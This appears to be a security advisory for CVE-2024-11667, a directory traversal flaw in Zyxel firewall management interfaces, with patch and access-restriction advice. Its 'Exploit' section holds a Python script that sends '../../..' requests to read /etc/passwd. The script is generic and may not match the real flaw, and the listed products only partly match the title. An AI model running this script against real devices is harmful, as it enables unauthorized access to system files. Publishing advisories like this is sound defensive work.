CVE-2024-11667: Directory Traversal Vulnerability in Zyxel ATP, USG FLEX, and USG VPN Series Firmware

Summary: A critical directory traversal vulnerability (CVE-2024-11667) has been discovered in the web management interface of multiple Zyxel network security appliances. The vulnerability is present in:

USG20(W)-VPN series firmware versions V5.10 through V5.38

The vulnerability could allow an attacker to upload or download confidential files via a specially crafted URL.

Vulnerability Details: The affected web management interface fails to properly validate user-supplied inputs, allowing an attacker to navigate out of the intended directory and access sensitive information. This directory traversal vulnerability ultimately allows the perpetrator to access or modify crucial files, potentially compromising the security appliance and the network it's protecting.

Exploit

An attacker can exploit this vulnerability by utilizing a crafted URL that points to files or directories outside the accepted boundaries of the web interface. Here's a code snippet showing how this can be accomplished:

import requests

# Replace the following values with the relevant target info
target_url = "https://TARGET-IP:TARGET-PORT/";
session_cookie = "session=YOUR_SESSION_COOKIE"
target_file = "/etc/passwd"

crafted_url = target_url + "../../.." + target_file
headers = {'Cookie': session_cookie}

response = requests.get(crafted_url, headers=headers, verify=False)

if response.status_code == 200:
    print("Vulnerable (CVE-2024-11667):")
    print(response.text)
else:
    print("Not vulnerable or unable to verify vulnerability.")

This code uses Python's requests library to send an HTTP GET request with a crafted URL that contains directory traversal sequences (e.g., ../../..). If the target is vulnerable, the response will contain the contents of the /etc/passwd file.

Mitigation

To mitigate this vulnerability, Zyxel has released firmware updates for the affected products.

USG20(W)-VPN series: V5.39 _or newer_

The firmware updates can be downloaded from the official Zyxel website: Zyxel Firmware Updates

Additionally, restrict access to the web management interface to trusted networks and IP addresses.

References

1. CVE-2024-11667 - Official CVE Description
2. Zyxel Security Advisory
3. Zyxel Firmware Updates

*Disclaimer*: This information is provided for educational purposes and personal security only. Do not use it to engage in malicious activities or illegal conduct.

Timeline

Published on: 11/27/2024 10:15:04 UTC
Last modified on: 11/28/2024 03:15:14 UTC